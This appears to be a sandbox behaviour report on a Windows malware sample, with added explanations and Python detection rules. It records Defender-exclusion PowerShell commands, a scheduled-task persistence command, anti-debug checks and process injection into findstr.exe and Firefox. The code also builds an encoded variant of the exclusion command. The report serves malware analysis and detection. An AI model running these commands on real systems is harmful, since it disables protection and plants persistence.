Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3164 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3880 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep count: 212 > 30
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep time: -424000s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 1332 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep count: 9747 > 30
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep time: -19494000s >= -30000s
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe TID: 2244 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed (2 occurrences)
Source: C:\Windows\SysWOW64\findstr.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\SysWOW64\findstr.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E183F0 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register, 19_2_61E183F0
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 occurrences)
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 30000 (2 occurrences)
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
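The sleep figures above are not arbitrary. 922337203685477 is 2^63 100-ns ticks expressed in milliseconds, which is what a report prints when a thread passes the most negative LARGE_INTEGER (the Sleep(INFINITE) encoding) to NtDelayExecution, and the larger per-thread totals are exact multiples of it: 23x for ekte.exe TID 3480, 22x for eFDiSxeTfjUqTk.exe TID 3908, 3x for powershell.exe TID 3776. Those are infinite waits of the kind idle worker and timer threads sit in all the time and carry no signal on their own; the finite values (240000, 540000, 424000 and 19494000 ms) are the ones that exceed the report's 3-minute threshold, and the findstr.exe thread's 19494000 ms over 9747 calls resolves to a 2-second sleep loop. The Python below is an added example, not part of the report: it parses lines in the report's own format (the sample lines are copied from above), separates infinite waits from finite sleeps and applies the 3-minute threshold. The millisecond unit and the INFINITE interpretation are this example's assumptions.

```python
"""Decode the 'Thread sleep time' lines of a sandbox report.

Added example, not part of the report. Two labelled assumptions: the report
prints the requested delay in milliseconds (the 's' suffix notwithstanding),
and 922337203685477 is 2**63 100-ns ticks / 10_000, i.e. the most negative
LARGE_INTEGER that Sleep(INFINITE) hands to NtDelayExecution.
"""
import ntpath
import re
from collections import defaultdict

INFINITE_MS = (1 << 63) // 10_000  # 922337203685477 (assumption: INFINITE encoding)
LONG_SLEEP_MS = 3 * 60 * 1000      # the report's "long sleeps (>= 3 min)" threshold

TIME_RE = re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")
COUNT_RE = re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+)")

# Constructed sample: lines copied from the report in its own format.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3724 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep count: 9747 > 30
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep time: -19494000s >= -30000s
""".strip().splitlines()


def decode_delay(ms: int) -> dict:
    """Split a reported delay into whole INFINITE waits and a finite remainder."""
    infinite, finite_ms = divmod(ms, INFINITE_MS)
    return {"infinite_waits": infinite, "finite_ms": finite_ms,
            "long_sleep": finite_ms >= LONG_SLEEP_MS}


def summarize(lines):
    """Aggregate per (image, tid): infinite waits, finite ms, call count, avg ms per call."""
    threads = defaultdict(lambda: {"infinite_waits": 0, "finite_ms": 0, "calls": 0})
    for line in lines:
        if m := TIME_RE.match(line):
            d = decode_delay(int(m["ms"]))
            t = threads[(m["image"], int(m["tid"]))]
            t["infinite_waits"] += d["infinite_waits"]
            t["finite_ms"] += d["finite_ms"]
        elif m := COUNT_RE.match(line):
            t = threads[(m["image"], int(m["tid"]))]
            t["calls"] = max(t["calls"], int(m["n"]))
    for t in threads.values():
        t["long_sleep"] = t["finite_ms"] >= LONG_SLEEP_MS
        # Average per call is only meaningful when the report also gave a count.
        t["avg_ms_per_call"] = t["finite_ms"] // t["calls"] if t["calls"] else None
    return dict(threads)


if __name__ == "__main__":
    for (image, tid), t in summarize(SAMPLE_LINES).items():
        print(ntpath.basename(image), tid, t)
```

Reading the output this way separates the two populations: threads whose totals are pure multiples of INFINITE_MS are blocked waiters, while threads with a large finite total and a high call count are the timing loops the "Contains long sleeps" and "threadDelayed" signatures are about.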
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ekte.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\findstr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A00101 rdtsc 8_2_00A00101
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk, 8_2_009B07AC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009A0080 mov ecx, dword ptr fs:[00000030h] 8_2_009A0080
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009A00EA mov eax, dword ptr fs:[00000030h] 8_2_009A00EA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C26F8 mov eax, dword ptr fs:[00000030h] 8_2_009C26F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (4 occurrences)
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" (2 occurrences)
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" (2 occurrences)
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" (4 occurrences)
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateUserProcess: Direct from: 0x774D093E
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateKey: Direct from: 0x774CFB62
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQuerySystemInformation: Direct from: 0x774D20DE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtWriteVirtualMemory: Direct from: 0x774D213E
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateFile: Direct from: 0x774D00D6
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetTimer: Direct from: 0x774D021A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenFile: Direct from: 0x774CFD86
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationThread: Direct from: 0x774E9893
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenKeyEx: Direct from: 0x774CFA4A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtResumeThread: Direct from: 0x774D008D
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenKeyEx: Direct from: 0x774D103A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtDelayExecution: Direct from: 0x774CFDA1
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationProcess: Direct from: 0x774CFB4A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationThread: Direct from: 0x774CF9CE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtReadFile: Direct from: 0x774CF915
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtMapViewOfSection: Direct from: 0x774CFC72
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateThreadEx: Direct from: 0x774D08C6
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtDeviceIoControlFile: Direct from: 0x774CF931
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtRequestWaitReplyPort: Direct from: 0x753C6BCE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryValueKey: Direct from: 0x774CFACA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenSection: Direct from: 0x774CFDEA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtProtectVirtualMemory: Direct from: 0x774D005A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtWriteVirtualMemory: Direct from: 0x774CFE36
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtRequestWaitReplyPort: Direct from: 0x756F8D92
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtNotifyChangeKey: Direct from: 0x774D0F92
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryAttributesFile: Direct from: 0x774CFE7E
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtReadVirtualMemory: Direct from: 0x774CFEB2
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetTimer: Direct from: 0x774E98D5
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationFile: Direct from: 0x774CFC5A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQuerySystemInformation: Direct from: 0x774CFDD2
Source: C:\Users\user\Desktop\ekte.exe Memory written: C:\Users\user\Desktop\ekte.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory written: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\ekte.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and write
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: NULL target: C:\Users\user\Desktop\ekte.exe protection: execute and read and write
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: read write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" (2 occurrences)
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
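The process chain above gives a SOC three anchors in ordinary process-creation telemetry: powershell.exe adding a Defender path exclusion, schtasks.exe importing a task definition from %TEMP% (the two Sigma hits listed in the summary), and findstr.exe started with an empty argument list by a parent outside the Windows directory and then launching Firefox, which is how the injected host process shows up. Note that powershell.exe and schtasks.exe run from C:\Windows\SysWOW64 although their command lines name System32: the 32-bit parent is subject to WOW64 file-system redirection, so a rule keyed on the full System32 image path misses them and should match on the image basename instead. The Python below is an added example, not code from the report or from the sandbox vendor. Its events are constructed from the lines above in a Sysmon-like shape with invented PIDs; one extra event (pid 109) wraps the same cmdlet in -EncodedCommand to cover the base64 variant the summary's Sigma rule names, and the rule names, utility list and task-host parents are this example's own choices.

```python
"""Rules over the process-creation chain shown in this report.

Added example, not code from the report or the sandbox vendor. Events are
constructed from the 'Process created' lines (PIDs invented); pid 109 is an
extra, constructed event showing the -EncodedCommand form. Rules key on the
image basename because the 32-bit parent launched powershell.exe and
schtasks.exe from SysWOW64 while their command lines name System32.
"""
import base64
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


def encode_powershell_command(text: str) -> str:
    """Encode text the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
EKTE = r"C:\Users\user\Desktop\ekte.exe"
DROP = r"C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
HOST = r"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"

EVENTS = [  # constructed sample; PIDs are invented
    ProcEvent(100, 1, EKTE, f'"{EKTE}"'),
    ProcEvent(101, 100, PS, f'{PS_CMD} Add-MpPreference -ExclusionPath "{EKTE}"'),
    ProcEvent(102, 100, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"'),
    ProcEvent(103, 100, EKTE, f'"{EKTE}"'),
    ProcEvent(104, 1, r"C:\Windows\System32\taskeng.exe", "taskeng.exe"),
    ProcEvent(105, 104, DROP, DROP),
    ProcEvent(106, 1, HOST, f'"{HOST}"'),
    ProcEvent(107, 106, r"C:\Windows\SysWOW64\findstr.exe", r'"C:\Windows\SysWOW64\findstr.exe"'),
    ProcEvent(108, 107, r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"'),
    # Not in the report: the same cmdlet hidden behind -EncodedCommand.
    ProcEvent(109, 100, PS, f"{PS_CMD} -nop -w hidden -enc "
              + encode_powershell_command(f'Add-MpPreference -ExclusionPath "{DROP}"')),
]

ENC_RE = re.compile(r"[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HOST_UTILITIES = {"findstr.exe", "cmd.exe", "ipconfig.exe", "netsh.exe", "explorer.exe"}  # illustrative
TASK_HOSTS = {"taskeng.exe", "svchost.exe"}  # Task Scheduler launch parents (older / newer Windows)


def effective_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so rules can see it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def has_arguments(cmdline: str) -> bool:
    """True when anything follows the (possibly quoted) program path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.partition(" ")[2]
    return bool(rest.strip())


def detect(events):
    """Return (pid, rule) pairs for the behaviours this report flagged."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)
    findings = []
    for e in events:
        name = ntpath.basename(e.image).lower()
        cmd = effective_command(e.command_line).lower()
        parent = by_pid.get(e.ppid)
        pname = ntpath.basename(parent.image).lower() if parent else ""
        if name == "powershell.exe" and "add-mppreference" in cmd and "-exclusion" in cmd:
            findings.append((e.pid, "defender_exclusion_added"))
        if name == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and "\\appdata\\local\\temp\\" in cmd:
            findings.append((e.pid, "scheduled_task_from_temp_xml"))
        if parent and parent.image.lower() == e.image.lower():
            findings.append((e.pid, "self_relaunch"))  # the loader re-executing its own image
        if pname in TASK_HOSTS and "\\appdata\\roaming\\" in e.image.lower():
            findings.append((e.pid, "task_runs_binary_from_roaming"))
        if name in HOST_UTILITIES and not has_arguments(e.command_line) and children[e.pid]:
            findings.append((e.pid, "argless_utility_spawns_child"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The last rule is deliberately a heuristic: findstr.exe with no arguments is useless on its own, so a bare invocation that goes on to create a browser process is the injected host, not a user's search. Extend HOST_UTILITIES with the other system binaries your telemetry shows this family borrowing rather than hard-coding one name.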
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: C:\Users\user\Desktop\ekte.exe Queries volume information: C:\Users\user\Desktop\ekte.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
